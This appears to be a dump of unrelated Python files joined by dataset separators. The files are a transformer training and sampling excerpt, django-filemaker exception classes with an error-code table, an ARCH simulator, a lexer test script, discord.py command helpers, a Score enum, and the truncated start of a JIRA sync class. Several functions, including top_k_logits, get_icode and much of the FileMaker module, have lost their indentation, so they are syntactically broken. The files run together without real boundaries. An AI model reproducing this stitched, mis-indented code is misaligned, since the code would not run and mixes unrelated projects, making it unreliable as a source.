            no_decay.add('h_emb') if 'h_emb' in param_dict.keys() else None
            no_decay.add('w_emb') if 'w_emb' in param_dict.keys() else None
            no_decay.add('s_emb') if 's_emb' in param_dict.keys() else None
            no_decay.add('t_emb') if 't_emb' in param_dict.keys() else None
            no_decay.add('state_pos_emb') if 'state_pos_emb' in param_dict.keys() else None
            no_decay.add('state_s_emb') if 'state_s_emb' in param_dict.keys() else None
            # validate that we considered every parameter
            inter_params = decay & no_decay
            union_params = decay | no_decay
            assert len(inter_params) == 0, "parameters %s made it into both decay/no_decay sets!" % (str(inter_params),)
            assert len(param_dict.keys() - union_params) == 0, "parameters %s were not separated into either decay/no_decay set!" % (str(param_dict.keys() - union_params),)
            # create the pytorch optimizer object
            if opt.finetune_head:
                # Head trains at full lr; everything else at lr * finetune_f.
                optim_groups = [{"params": [param_dict[pn] for pn in sorted(list(decay)) if pn != "head.weight"], "weight_decay": 0.01, "lr": opt.lr * opt.finetune_f},
                                {"params": [param_dict["head.weight"]], "weight_decay": 0.01, "lr": opt.lr},
                                {"params": [param_dict[pn] for pn in sorted(list(no_decay))], "weight_decay": 0.0, "lr": opt.lr * opt.finetune_f}]
            else:
                optim_groups = [{"params": [param_dict[pn] for pn in sorted(list(decay))], "weight_decay": 0.01, "lr": opt.lr},
                                {"params": [param_dict[pn] for pn in sorted(list(no_decay))], "weight_decay": 0.0, "lr": opt.lr}]
        if opt.optimizer == "adamw":
            opt_t = torch.optim.AdamW(optim_groups, betas=(opt.beta1, opt.beta2))
        else:
            raise NotImplementedError
        return opt_t
    def compute_transformer_loss(self, code, state_code, cond_code, delta_length_cond, vid_lbl, prefix, log, global_iter, is_eval=False):
        """Next-token prediction loss.

        Continuous codes: MSE between the predicted and true next embeddings.
        Discrete codes: cross-entropy over the vocabulary, plus an extra
        cross-entropy term for interleaved state tokens when present.
        Scalars are logged under ``transformer/{prefix}...`` unless is_eval.
        """
        code = code[:, :self.opt.z_len] # limit input to transformer capacity
        state_nll_loss = None
        if self.opt.is_continuous:
            # Continuous regime: regress the next embedding directly.
            if self.opt.p2p:
                pred = self.net_t(code[:, :-1], cond_code, delta_length_cond, lbl_idx=vid_lbl)
            else:
                pred = self.net_t(code[:, :-1], lbl_idx=vid_lbl)
            tgt = code[:, 1:]
            vmf_loss = None
            other_vmf_loss = None
            cosine_loss = None
            other_cosine_loss = None
            # nll_loss = None
            nll_loss = F.mse_loss(pred, tgt)
            t_loss = nll_loss
            # if self.opt.n_proposals > 1:
            #     t_loss = torch.tensor(0., requires_grad=True).cuda()
            #     logits, proposals = pred
            #     nm_proposals = proposals / torch.norm(proposals, p=2, dim=3, keepdim=True) if self.opt.normalize_pred else proposals
            #     nm_tgt = tgt / torch.norm(tgt, p=2, dim=2, keepdim=True) if self.opt.normalize_tgt else tgt
            #     cosine_dist = - (nm_proposals * nm_tgt.unsqueeze(2)).sum(dim=3)
            #     closest_proposals = cosine_dist.argmin(dim=2, keepdim=True)
            #     nll_loss = F.cross_entropy(logits.view(-1, logits.size(-1)), closest_proposals.view(-1))
            #     t_loss += nll_loss
            #     if self.opt.knn is not None:
            #         k_closest = max(1, int(self.opt.knn * (1 - global_iter / self.opt.knn_decay_iter)))
            #         closest_proposals = (-cosine_dist).topk(dim=2, k=k_closest)[1]
            #     else:
            #         k_closest = 1
            #     closest_onehot = torch.zeros(*closest_proposals.shape[:2], self.opt.n_proposals).cuda().scatter_(2, closest_proposals, 1)
            #     if self.opt.continuous_loss == "cosine":
            #         pred = nm_proposals[closest_onehot.bool()].view(*nm_proposals.shape[:2], k_closest, -1)
            #         cosine_loss = - (pred * tgt.unsqueeze(2)).sum(dim=3).mean()
            #         if self.opt.knn is not None:
            #             t_loss += cosine_loss
            #         else:
            #             other_preds = nm_proposals[~closest_onehot.bool()].view(*nm_proposals.shape[:2], self.opt.n_proposals - k_closest, -1)
            #             other_cosine_loss = - (other_preds * tgt.unsqueeze(2)).sum(dim=3).mean()
            #             t_loss += (1 - self.opt.epsilon_other) * cosine_loss + self.opt.epsilon_other * other_cosine_loss
            #     elif self.opt.continuous_loss == "vmf":
            #         pred = proposals[closest_onehot.bool()].view(*nm_proposals.shape[:2], k_closest, -1)
            #         vmf_loss = nll_vMF(pred, tgt.unsqueeze(2))
            #         if self.opt.knn is not None:
            #             t_loss += vmf_loss
            #         else:
            #             other_preds = proposals[~closest_onehot.bool()].view(*nm_proposals.shape[:2], self.opt.n_proposals - k_closest, -1)
            #             other_vmf_loss = nll_vMF(other_preds, tgt.unsqueeze(2))
            #             t_loss += (1 - self.opt.epsilon_other) * vmf_loss + self.opt.epsilon_other * other_vmf_loss
            #
            # else:
            #     if self.opt.continuous_loss == "cosine":
            #         if self.opt.normalize_pred:
            #             pred = pred / torch.norm(pred, p=2, dim=2, keepdim=True)
            #         if self.opt.normalize_tgt:
            #             tgt = tgt / torch.norm(tgt, p=2, dim=2, keepdim=True)
            #         cosine_loss = - (pred * tgt).sum(dim=2).mean()
            #         t_loss = cosine_loss
            #     elif self.opt.continuous_loss == "vmf":
            #         vmf_loss = nll_vMF(pred, tgt)
            #         t_loss = vmf_loss
            nrec_loss = None
            nrec_momentum_loss = None
        else:
            logits = self.net_t(code[:, :-1], cond_idx=cond_code, state_idx=state_code, delta_length_cond=delta_length_cond, lbl_idx=vid_lbl)
            if 0 not in state_code.size():
                # Split logit positions into those predicting state tokens vs frame tokens.
                if self.opt.state_front:
                    state_i = [i for i in range(logits.size(1)) if (i + 1) < self.state_size * self.opt.num_blocks]
                    frame_i = [i for i in range(logits.size(1)) if (i + 1) >= self.state_size * self.opt.num_blocks]
                else:
                    state_i = [i for i in range(logits.size(1)) if (i + 1) % self.tot_size < self.state_size]
                    frame_i = [i for i in range(logits.size(1)) if (i + 1) % self.tot_size >= self.state_size]
                state_logits = logits[:, state_i, :self.opt.state_num]
                logits = logits[:, frame_i]
                target = code
            else:
                if self.opt.use_start_token or self.opt.cat:
                    target = code
                else:
                    target = code[:, 1:]
            nll_loss = F.cross_entropy(logits.reshape(-1, logits.size(-1)), target.reshape(-1))
            nrec_loss = None
            other_vmf_loss = None
            cosine_loss = None
            other_cosine_loss = None
            nrec_momentum_loss = None
            vmf_loss = None
            t_loss = nll_loss
            if 0 not in state_code.size():
                state_nll_loss = F.cross_entropy(state_logits.reshape(-1, state_logits.size(-1)), state_code[:, 1:].reshape(-1))
                t_loss += state_nll_loss
        if self.logger and not is_eval:
            # log scalars every step
            self.logger.log_scalar(f"transformer/{prefix}nll", nll_loss, global_iter)
            self.logger.log_scalar(f"transformer/{prefix}state_nll", state_nll_loss, global_iter)
            self.logger.log_scalar(f"transformer/{prefix}cosine", cosine_loss, global_iter)
            self.logger.log_scalar(f"transformer/{prefix}other_cosine", other_cosine_loss, global_iter)
            self.logger.log_scalar(f"transformer/{prefix}vmf", vmf_loss, global_iter)
            self.logger.log_scalar(f"transformer/{prefix}other_vmf", other_vmf_loss, global_iter)
            self.logger.log_scalar(f"transformer/{prefix}nrec", nrec_loss, global_iter)
            self.logger.log_scalar(f"transformer/{prefix}nrec_momentum", nrec_momentum_loss, global_iter)
        return t_loss
def top_k_logits(self, logits, k):
v, _ = torch.topk(logits, k)
out = logits.clone()
out[out < v[..., [-1]]] = -float('Inf')
return out
    @torch.no_grad()
    def generate_fake(self, code, state_code, cond_code, delta_length_cond, vid_lbl, total_len, show_progress):
        ''' If 'total_len' is 'None' generate tokens with transformer until the capacity 'z_len' of the transformer has
        been reached. Otherwise, fill the code until 'total_len' is reached with a 'z_chunk' stride.

        Returns {"code": ..., "state_code": ...} with the generated sequences.
        '''
        if total_len is None:
            code, state_code = self.fill_code(code, state_code, cond_code, delta_length_cond, vid_lbl, show_progress=show_progress)
            return {"code": code, "state_code": state_code}
        if total_len <= self.opt.z_len:
            # Everything fits in one transformer window; conditioning and state
            # tokens consume part of the budget.
            add_len = total_len - code.size(1)
            add_len -= cond_code.size(1) if 0 not in cond_code.size() else 0
            add_len -= min(state_code.size(1), self.opt.state_size * self.opt.num_blocks) if 0 not in state_code.size() else 0
            code, state_code = self.fill_code(code, state_code, cond_code, delta_length_cond, vid_lbl, add_len=add_len, show_progress=show_progress)
            return {"code": code, "state_code": state_code}
        if show_progress:
            pbar = tqdm(total=int(total_len), desc="Processing codes")
        # 1. fill until transformer capacity 'z_len' is reached
        code, state_code = self.fill_code(code, state_code, cond_code, delta_length_cond, vid_lbl, show_progress=show_progress)
        # 2. predict 'z_chunk' by 'z_chunk'
        curr_len = self.opt.z_len
        if show_progress:
            pbar.update(curr_len)
        i = 1
        while curr_len < total_len:
            # Last chunk may be shorter than z_chunk.
            add_len = total_len - curr_len if total_len - curr_len < self.opt.z_chunk else None
            if 0 not in cond_code.size():
                delta_length_cond -= 1
            # free some capacity for one chunk
            tmp_state_code = state_code[:, i * self.state_size:] if 0 not in state_code.size() else state_code
            tmp_code = code[:, i * self.size:]
            # predict one chunk
            pred_code, pred_state_code = self.fill_code(tmp_code, tmp_state_code, cond_code, delta_length_cond, vid_lbl, add_len=add_len, show_progress=show_progress)
            # update code
            delta_code = pred_code.size(1) - tmp_code.size(1)
            code = torch.cat([code, pred_code[:, -delta_code:]], dim=1)
            if 0 not in state_code.size():
                delta_state_code = pred_state_code.size(1) - tmp_state_code.size(1)
                if delta_state_code > 0:
                    state_code = torch.cat([state_code, pred_state_code[:, -delta_state_code:]], dim=1)
                # else:
                #     curr_len += self.state_size
            # keep track of progress
            curr_len += add_len if add_len is not None else self.opt.z_chunk
            if show_progress:
                # if add_len is not None:
                #     print("add_len", add_len)
                # else:
                #     print("z_chunk", self.opt.z_chunk)
                pbar.update(add_len if add_len is not None else self.opt.z_chunk)
            i += 1
        if show_progress:
            pbar.close()
        return {"code": code, "state_code": state_code}
    def fill_code(self, code, state_code, cond_code, delta_length_cond, vid_lbl, add_len=None, show_progress=False):
        """Autoregressively append `add_len` tokens (default: up to z_len capacity),
        routing each prediction to `code` or `state_code`, with optional beam search.
        Returns the extended (code, state_code).
        """
        bs = code.size(0)
        log_p = None
        # compute add_len
        if add_len is None:
            add_len = self.opt.z_len - code.size(1)
            add_len -= cond_code.size(1) if 0 not in cond_code.size() else 0
            add_len -= min(state_code.size(1), self.opt.state_size * self.opt.num_blocks) if 0 not in state_code.size() else 0
        # iterate
        pbar = tqdm(range(add_len), desc="Filling codes", leave=False) if show_progress else range(add_len)
        for _ in pbar:
            if self.opt.is_continuous:
                # Continuous regime: the network emits the next embedding directly.
                pred = self.net_t(code, single=True)
                if self.opt.normalize_pred:
                    pred = pred / torch.norm(pred, p=2, dim=2, keepdim=True)
                code = torch.cat((code, pred), dim=1)
            else:
                logits = self.net_t(code, cond_idx=cond_code, state_idx=state_code, delta_length_cond=delta_length_cond, lbl_idx=vid_lbl)
                # determine if prediction needs to be affected to code or state_code
                is_state = 0 not in state_code.size() and logits.size(1) % self.tot_size < self.state_size
                if is_state:
                    # State tokens are sampled with their own temperature/top-k.
                    logits = logits[:, :, :self.opt.state_num]
                    icode = self.get_icode(logits, self.opt.temperature_state, self.opt.top_k_state, self.opt.sample_state)[0]
                    state_code = torch.cat((state_code, icode), dim=1)
                else:
                    if self.opt.beam_size is not None:
                        if code.size(0) == bs:
                            # expand
                            # First step: fan the batch out into beam_size hypotheses.
                            code = code.unsqueeze(1).repeat(1, self.opt.beam_size, 1).view(bs * self.opt.beam_size, -1)
                            icode, ilog_p = self.get_icode(logits, self.opt.temperature, self.opt.top_k, self.opt.sample, n=self.opt.beam_size)
                            log_p = ilog_p
                            icode = icode.view(-1, 1)
                        else:
                            if not self.opt.no_sample:
                                # Stochastic beams: one sampled continuation per hypothesis.
                                icode, ilog_p = self.get_icode(logits, self.opt.temperature, self.opt.top_k, self.opt.sample, n=1)
                                log_p += ilog_p.view(bs, self.opt.beam_size)
                                icode = icode.view(-1, 1)
                            else:
                                # expand
                                # Deterministic beams: expand to beam_size^2 candidates, then prune.
                                icode, ilog_p = self.get_icode(logits, self.opt.temperature, self.opt.top_k, self.opt.sample, n=self.opt.beam_size)
                                log_p = log_p.unsqueeze(1).repeat(1, self.opt.beam_size, 1)
                                log_p += ilog_p.view(bs, self.opt.beam_size, self.opt.beam_size)
                                icode = icode.view(bs, self.opt.beam_size * self.opt.beam_size)
                                log_p = log_p.view(bs, self.opt.beam_size * self.opt.beam_size)
                                # prune
                                log_p, keep = torch.topk(log_p, dim=1, k=self.opt.beam_size)
                                icode = torch.gather(icode, dim=1, index=keep).view(-1, 1)
                                code = code.unsqueeze(1).repeat(1, self.opt.beam_size, 1).view(bs, self.opt.beam_size * self.opt.beam_size, -1)
                                keep = keep.unsqueeze(-1).repeat(1, 1, code.size(-1))
                                code = torch.gather(code, dim=1, index=keep).view(-1, code.size(-1))
                    else:
                        icode = self.get_icode(logits, self.opt.temperature, self.opt.top_k, self.opt.sample)[0]
                    code = torch.cat((code, icode), dim=1)
        if self.opt.beam_size is not None:
            # keep best hypothesis
            _, best = torch.topk(log_p, dim=1, k=1)
            code = code.view(bs, self.opt.beam_size, -1)
            best = best.unsqueeze(-1).repeat(1, 1, code.size(-1))
            code = torch.gather(code, dim=1, index=best).view(bs, code.size(-1))
        return code, state_code
def get_icode(self, logits, temperature, top_k, sample, n=1):
# pluck the logits at the final step and scale by temperature
logits = logits[:, -1] / temperature
# optionally crop probabilities to only the top k options
if top_k is not None:
logits = self.top_k_logits(logits, top_k)
# apply softmax to convert to probabilities
probs = F.softmax(logits, dim=-1)
# sample from the distribution or take the most likely
if sample:
icode = torch.multinomial(probs, num_samples=n)
else:
_, icode = torch.topk(probs, k=n, dim=-1)
ilog_p = torch.log(torch.gather(probs, 1, icode))
return icode, ilog_p | StarcoderdataPython |
5140489 | <reponame>TitanEntertainmentGroup/django-filemaker
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.exceptions import ValidationError
__all__ = ['FileMakerError', 'FileMakerValidationError',
'FileMakerObjectDoesNotExist', 'FileMakerConnectionError',
'FileMakerServerError']
class FileMakerError(Exception):
'''
This is the base exception related to FileMaker operations. All other
exceptions here inherit from it.
'''
pass
class FileMakerValidationError(FileMakerError, ValidationError):
'''
Raised when a FileMaker field fails validation. The same as Django's
``django.core.exceptions.ValidationError`` (from which it inherits).
When raised by a field, the field raising it will be available on the
exception as the ``field`` attribute.
'''
def __init__(self, *args, **kwargs):
self.field = kwargs.pop('field', None)
return super(FileMakerValidationError, self).__init__(*args, **kwargs)
class FileMakerObjectDoesNotExist(FileMakerError):
'''
Raised when no :py:class:`FileMakerModel` instance matching a query is
found.
Every :py:class:`FileMakerModel` has a sub-class of this as `DoesNotExist`
enabling you to catch exceptions raised by a specific model.
'''
pass
class FileMakerConnectionError(FileMakerError):
'''
Raised when an HTTP or other error is encountered when attempting to
connect to the FileMaker server.
'''
pass
class FileMakerServerError(FileMakerError):
    '''
    Indicates an error returned by FileMaker. This is raised by the result
    parser and in turn by the FileMaker managers.

    The exact FileMaker error code is available on the exception as the
    ``code`` attribute, and the corresponding text representation of the error
    is on the ``message`` attribute.
    '''

    #: Human-readable text for every documented FileMaker error code.
    #: ``-1`` is the fallback used for any code we do not recognise.
    error_codes = {
        -1: 'Unknown error',
        0: 'Non FileMaker error',
        1: 'User canceled action',
        2: 'Memory error',
        3: 'Command is unavailable (for example, wrong operating system, '
           'wrong mode, etc.)',
        4: 'Command is unknown',
        5: 'Command is invalid (for example, a Set Field script step does '
           'not have a calculation specified)',
        6: 'File is read-only',
        7: 'Running out of memory',
        8: 'Empty result',
        9: 'Insufficient privileges',
        10: 'Requested data is missing',
        11: 'Name is not valid',
        12: 'Name already exists',
        13: 'File or object is in use',
        14: 'Out of range',
        15: 'Can\'t divide by zero',
        16: 'Operation failed, request retry (for example, a user query)',
        17: 'Attempt to convert foreign character set to UTF-16 failed',
        18: 'Client must provide account information to proceed',
        19: 'String contains characters other than A-Z, a-z, 0-9 (ASCII)',
        100: 'File is missing',
        101: 'Record is missing',
        102: 'Field is missing',
        103: 'Relationship is missing',
        104: 'Script is missing',
        105: 'Layout is missing',
        106: 'Table is missing',
        107: 'Index is missing',
        108: 'Value list is missing',
        109: 'Privilege set is missing',
        110: 'Related tables are missing',
        111: 'Field repetition is invalid',
        112: 'Window is missing',
        113: 'Function is missing',
        114: 'File reference is missing',
        130: 'Files are damaged or missing and must be reinstalled',
        131: 'Language pack files are missing (such as template files)',
        200: 'Record access is denied',
        201: 'Field cannot be modified',
        202: 'Field access is denied',
        203: 'No records in file to print, or password doesn\'t allow print '
             'access',
        204: 'No access to field(s) in sort order',
        205: 'User does not have access privileges to create new records; '
             'import will overwrite existing data',
        206: 'User does not have password change privileges, or file is '
             'not modifiable',
        207: 'User does not have sufficient privileges to change database '
             'schema, or file is not modifiable',
        208: 'Password does not contain enough characters',
        209: 'New password must be different from existing one',
        210: 'User account is inactive',
        211: 'Password has expired',
        212: 'Invalid user account and/or password. Please try again',
        213: 'User account and/or password does not exist',
        214: 'Too many login attempts',
        215: 'Administrator privileges cannot be duplicated',
        216: 'Guest account cannot be duplicated',
        217: 'User does not have sufficient privileges to modify '
             'administrator account',
        300: 'File is locked or in use',
        301: 'Record is in use by another user',
        302: 'Table is in use by another user',
        303: 'Database schema is in use by another user',
        # Fixed corrupted text ("inMa use" -> "in use").
        304: 'Layout is in use by another user',
        306: 'Record modification ID does not match',
        400: 'Find criteria are empty',
        # Fixed corrupted text ("matMach" -> "match").
        401: 'No records match the request',
        402: 'Selected field is not a match field for a lookup',
        403: 'Exceeding maximum record limit for trial version of '
             'FileMaker(tm) Pro',
        404: 'Sort order is invalid',
        405: 'Number of records specified exceeds number of records that '
             'can be omitted',
        406: 'Replace/Reserialize criteria are invalid',
        407: 'One or both match fields are missing (invalid relationship)',
        408: 'Specified field has inappropriate data type for this operation',
        409: 'Import order is invalid',
        410: 'Export order is invalid',
        412: 'Wrong version of FileMaker(tm) Pro used to recover file',
        413: 'Specified field has inappropriate field type',
        414: 'Layout cannot display the result',
        415: 'Related Record Required',
        500: 'Date value does not meet validation entry options',
        501: 'Time value does not meet validation entry options',
        502: 'Number value does not meet validation entry options',
        503: 'Value in field is not within the range specified in '
             'validation entry options',
        504: 'Value in field is not unique as required in validation '
             'entry options',
        505: 'Value in field is not an existing value in the database '
             'file as required in validation entry options',
        506: 'Value in field is not listed on the value list specified '
             'in validation entry option',
        507: 'Value in field failed calculation test of validation entry '
             'option',
        508: 'Invalid value entered in Find mode',
        509: 'Field requires a valid value',
        510: 'Related value is empty or unavailable',
        511: 'Value in field exceeds maximum number of allowed characters',
        600: 'Print error has occurred',
        601: 'Combined header and footer exceed one page',
        602: 'Body doesn\'t fit on a page for current column setup',
        603: 'Print connection lost',
        700: 'File is of the wrong file type for import',
        706: 'EPSF file has no preview image',
        707: 'Graphic translator cannot be found',
        708: 'Can\'t import the file or need color monitor support to '
             'import file',
        709: 'QuickTime movie import failed',
        710: 'Unable to update QuickTime file reference because the '
             'database file is read-only',
        711: 'Import translator cannot be found',
        714: 'Password privileges do not allow the operation',
        715: 'Specified Excel worksheet or named range is missing',
        716: 'A SQL query using DELETE, INSERT, or UPDATE is not allowed '
             'for ODBC import',
        717: 'There is not enough XML/XSL information to proceed with the '
             'import or export',
        718: 'Error in parsing XML file (from Xerces)',
        719: 'Error in transforming XML using XSL (from Xalan)',
        720: 'Error when exporting; intended format does not support '
             'repeating fields',
        721: 'Unknown error occurred in the parser or the transformer',
        722: 'Cannot import data into a file that has no fields',
        723: 'You do not have permission to add records to or modify '
             'records in the target table',
        724: 'You do not have permission to add records to the target table',
        725: 'You do not have permission to modify records in the '
             'target table',
        726: 'There are more records in the import file than in the '
             'target table. Not all records were imported',
        727: 'There are more records in the target table than in the '
             'import file. Not all records were updated',
        729: 'Errors occurred during import. Records could not be imported',
        730: 'Unsupported Excel version. (Convert file to Excel 7.0 '
             '(Excel 95), Excel 97, 2000, or XP format and try again)',
        731: 'The file you are importing from contains no data',
        732: 'This file cannot be inserted because it contains other files',
        733: 'A table cannot be imported into itself',
        734: 'This file type cannot be displayed as a picture',
        # Entry 800 had been fused into the text of 735; split back out.
        735: 'This file type cannot be displayed as a picture. It will be '
             'inserted and displayed as a file',
        800: 'Unable to create file on disk',
        801: 'Unable to create temporary file on System disk',
        802: 'Unable to open file',
        803: 'File is single user or host cannot be found',
        804: 'File cannot be opened as read-only in its current state',
        805: 'File is damaged; use Recover command',
        806: 'File cannot be opened with this version of FileMaker(tm) Pro',
        807: 'File is not a FileMaker(tm) Pro file or is severely damaged',
        808: 'Cannot open file because access privileges are damaged',
        809: 'Disk/volume is full',
        810: 'Disk/volume is locked',
        811: 'Temporary file cannot be opened as FileMaker(tm) Pro file',
        813: 'Record Synchronization error on network',
        814: 'File(s) cannot be opened because maximum number is open',
        815: 'Couldn\'t open lookup file',
        816: 'Unable to convert file',
        817: 'Unable to open file because it does not belong to this solution',
        819: 'Cannot save a local copy of a remote file',
        820: 'File is in the process of being closed',
        821: 'Host forced a disconnect',
        822: 'FMI files not found; reinstall missing files',
        823: 'Cannot set file to single-user, guests are connected',
        824: 'File is damaged or not a FileMaker(tm) file',
        900: 'General spelling engine error',
        901: 'Main spelling dictionary not installed',
        902: 'Could not launch the Help system',
        903: 'Command cannot be used in a shared file',
        904: 'Command can only be used in a file hosted under '
             'FileMaker(tm) Server',
        905: 'No active field selected; command can only be used if there '
             'is an active field',
        920: 'Can\'t initialize the spelling engine',
        921: 'User dictionary cannot be loaded for editing',
        922: 'User dictionary cannot be found',
        923: 'User dictionary is read-only',
        951: 'An unexpected error occurred (returned only by '
             'web-published databases)',
        954: 'Unsupported XML grammar (returned only by '
             'web-published databases)',
        955: 'No database name (returned only by web-published databases)',
        956: 'Maximum number of database sessions exceeded (returned '
             'only by web-published databases)',
        957: 'Conflicting commands (returned only by web-published databases)',
        958: 'Parameter missing (returned only by web-published databases)',
        971: 'The user name is invalid',
        972: 'The password is invalid',
        973: 'The database is invalid',
        974: 'Permission Denied',
        975: 'The field has restricted access',
        976: 'Security is disabled',
        977: 'Invalid client IP address',
        978: 'The number of allowed guests has been exceeded',
        1200: 'Generic calculation error',
        1201: 'Too few parameters in the function',
        1202: 'Too many parameters in the function',
        1203: 'Unexpected end of calculation',
        1204: 'Number, text constant, field name or "(" expected',
        1205: 'Comment is not terminated with "*/"',
        1206: 'Text constant must end with a quotation mark',
        1207: 'Unbalanced parenthesis',
        1208: 'Operator missing, function not found or "(" not expected',
        1209: 'Name (such as field name or layout name) is missing',
        1210: 'Plug-in function has already been registered',
        1211: 'List usage is not allowed in this function',
        1212: 'An operator (for example, +, -, *) is expected here',
        1213: 'This variable has already been defined in the Let function',
        1214: 'AVERAGE, COUNT, EXTEND, GETREPETITION, MAX, MIN, NPV, '
              'STDEV, SUM and GETSUMMARY: expression found where a field '
              'alone is needed',
        1215: 'This parameter is an invalid Get function parameter',
        1216: 'Only Summary fields allowed as first argument in GETSUMMARY',
        1217: 'Break field is invalid',
        1218: 'Cannot evaluate the number',
        1219: 'A field cannot be used in its own formula',
        1220: 'Field type must be normal or calculated',
        1221: 'Data type must be number, date, time, or timestamp',
        1222: 'Calculation cannot be stored',
        1223: 'The function referred to does not exist',
        1400: 'ODBC driver initialization failed; make sure the ODBC '
              'drivers are properly installed',
        1401: 'Failed to allocate environment (ODBC)',
        1402: 'Failed to free environment (ODBC)',
        1403: 'Failed to disconnect (ODBC)',
        1404: 'Failed to allocate connection (ODBC)',
        1405: 'Failed to free connection (ODBC)',
        1406: 'Failed check for SQL API (ODBC)',
        1407: 'Failed to allocate statement (ODBC)',
        1408: 'Extended error (ODBC)',
    }

    def __init__(self, code=-1):
        # Collapse unrecognised codes to the generic -1 entry so the
        # lookup below can never fail.
        if code not in self.error_codes:
            code = -1
        # Expose the raw code, as promised by the class docstring (it was
        # previously documented but never actually set).
        self.code = code
        self.message = 'FileMaker Error: {0}: {1}'.format(
            code, self.error_codes.get(code))
        super(FileMakerServerError, self).__init__(self.message)

    def __str__(self):
        return self.message
| StarcoderdataPython |
3387251 | <gh_stars>1-10
import typing
from TorchTSA.simulate.GARCHSim import GARCHSim
class ARCHSim(GARCHSim):
    """Simulate an ARCH(p) process: a GARCH(p, 0) with no beta terms.

    :param _alpha_arr: ARCH coefficient(s); a bare number is accepted for
        the ARCH(1) case and wrapped into a one-element tuple.
    :param _const: constant term of the conditional variance equation.
    :param _mu: mean of the process (defaults to 0.0).
    """

    def __init__(
            self,
            _alpha_arr: typing.Union[float, typing.Sequence[float]],
            _const: float, _mu: float = 0.0,
    ):
        # GARCHSim expects a sequence of alphas; normalise scalars first.
        if isinstance(_alpha_arr, (float, int)):
            _alpha_arr = (_alpha_arr,)
        super().__init__(
            _alpha_arr=_alpha_arr, _beta_arr=(),
            _const=_const, _mu=_mu
        )
| StarcoderdataPython |
6477219 | <filename>test_run_generated.py<gh_stars>10-100
from fable_sedlex.sedlex import from_ustring, lexbuf
from generated import lex, lexall, Token
# Exercise the generated lexer on a small sample input and dump every token.
buf = from_ustring(r'123 2345 + += 2.34E5 "sada\"sa" ')
tokens = []  # NOTE(review): never populated; kept for backward compatibility
EOF_ID = 0  # token_id the generated lexer uses to signal end-of-input


def is_eof(x: Token) -> bool:
    """Return True when *x* is the end-of-input token."""
    # Was a literal 0; use the EOF_ID constant declared for this purpose.
    return x.token_id == EOF_ID


print()
print(list(lexall(buf, Token, is_eof)))
| StarcoderdataPython |
1745951 | <filename>lifesaver/commands/core.py
# encoding: utf-8
__all__ = ["SubcommandInvocationRequired", "Command", "Group", "command", "group"]
from discord.ext import commands
class SubcommandInvocationRequired(commands.CommandError):
    """A :class:`discord.ext.commands.CommandError` subclass that is raised when a subcommand needs to be invoked."""
class Command(commands.Command):
    """A :class:`discord.ext.commands.Command` subclass that implements additional features.

    Supports a keyword-only ``typing`` flag: when set, a typing indicator is
    shown in the channel for as long as the command callback runs.
    """

    def __init__(self, *args, typing: bool = False, **kwargs) -> None:
        super().__init__(*args, **kwargs)
        #: Specifies whether to send typing indicators while the command is running.
        self.typing = typing

    async def invoke(self, ctx):
        if not self.typing:
            await super().invoke(ctx)
            return
        # Keep the typing indicator alive for the whole invocation.
        async with ctx.typing():
            await super().invoke(ctx)
class Group(commands.Group, Command):
    """A :class:`discord.ext.commands.Group` subclass that implements additional features.

    Supports a keyword-only ``hollow`` flag: when set, invoking the group
    without naming a subcommand raises :class:`SubcommandInvocationRequired`.
    """

    def __init__(self, *args, hollow: bool = False, **kwargs) -> None:
        super().__init__(*args, **kwargs)
        #: Specifies whether a subcommand must be invoked.
        self.hollow = hollow

    async def invoke(self, ctx):
        # An exhausted view means no more words follow, so no subcommand can
        # possibly be specified; refuse to run a hollow group on its own.
        if ctx.view.eof and self.hollow:
            raise SubcommandInvocationRequired()
        await super().invoke(ctx)

    def command(self, *args, **kwargs):
        def decorator(func):
            kwargs.setdefault("parent", self)
            created = command(*args, **kwargs)(func)
            self.add_command(created)
            return created

        return decorator

    def group(self, *args, **kwargs):
        def decorator(func):
            kwargs.setdefault("parent", self)
            created = group(*args, **kwargs)(func)
            self.add_command(created)
            return created

        return decorator
def command(name: str = None, cls=Command, **kwargs):
    """The command decorator.

    Works exactly like :func:`discord.ext.commands.command`.

    You can pass the ``typing`` keyword argument to wrap the entire command
    invocation in a :meth:`discord.ext.commands.Context.typing`, making the
    bot type for the duration the command runs.
    """
    return commands.command(name, cls, **kwargs)
def group(name: str = None, **kwargs):
    """The command group decorator.

    Works exactly like :func:`discord.ext.commands.group`.

    You can pass the ``hollow`` keyword argument in order to force the command invoker to
    specify a subcommand (raises :class:`lifesaver.commands.SubcommandInvocationRequired`).
    """
    return command(name, Group, **kwargs)
| StarcoderdataPython |
3212381 | from enum import Enum
THUMBS_UP = '+' # in case you go f-string ...
class Score(Enum):
    """Skill levels with a numeric weight used for display and averaging."""

    BEGINNER = 2
    INTERMEDIATE = 3
    ADVANCED = 4
    CHEATED = 1

    def __str__(self):
        # Render as e.g. "BEGINNER => ++" (one glyph per point).
        return f'{self.name} => {THUMBS_UP * self.value}'

    @classmethod
    def average(cls):
        """Return the mean of all member values."""
        # Generator instead of a throwaway list; len(cls) counts the members
        # directly (equivalent to len(cls.__members__) when there are no aliases).
        return sum(score.value for score in cls) / len(cls)
if __name__ == "__main__":
    # Demo: print each member's name/value, then the member-name mapping keys.
    for score in Score:
        print(f'{score.name:12} : {score.value}')
    print(list(Score.__members__))
| StarcoderdataPython |
1808269 | <reponame>boladmin/security_monkey
"""
.. module: security_monkey.jirasync
:platform: Unix
:synopsis: Creates and updates JIRA tickets based on current issues
.. version:: $$VERSION$$
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import datetime
import re
import time
import urllib.request, urllib.parse, urllib.error
import yaml
from jira.client import JIRA
from security_monkey.datastore import Account, Technology, AuditorSettings
from security_monkey import app
class JiraSync(object):
    """ Syncs auditor issues with JIRA tickets. """

    def __init__(self, jira_file):
        """Load the JIRA sync YAML configuration and connect to the server.

        :param jira_file: path to a YAML file containing ``account``,
            ``password``, ``project``, ``server``, ``issue_type`` and ``url``,
            plus optional proxy/behaviour settings.
        :raises Exception: when the configuration is missing, malformed, or
            the connection to JIRA fails.
        """
        try:
            with open(jira_file) as jf:
                data = jf.read()
            data = yaml.safe_load(data)
            self.account = data['account']
            self.password = data['password']
            self.project = data['project']
            self.server = data['server']
            self.issue_type = data['issue_type']
            self.url = data['url']
            self.ip_proxy = data.get('ip_proxy')
            self.port_proxy = data.get('port_proxy')
            self.disable_transitions = data.get('disable_transitions', False)
            self.assignee = data.get('assignee', None)
            self.only_update_on_change = data.get('only_update_on_change', False)
        except KeyError as e:
            raise Exception('JIRA sync configuration missing required field: {}'.format(e))
        except IOError as e:
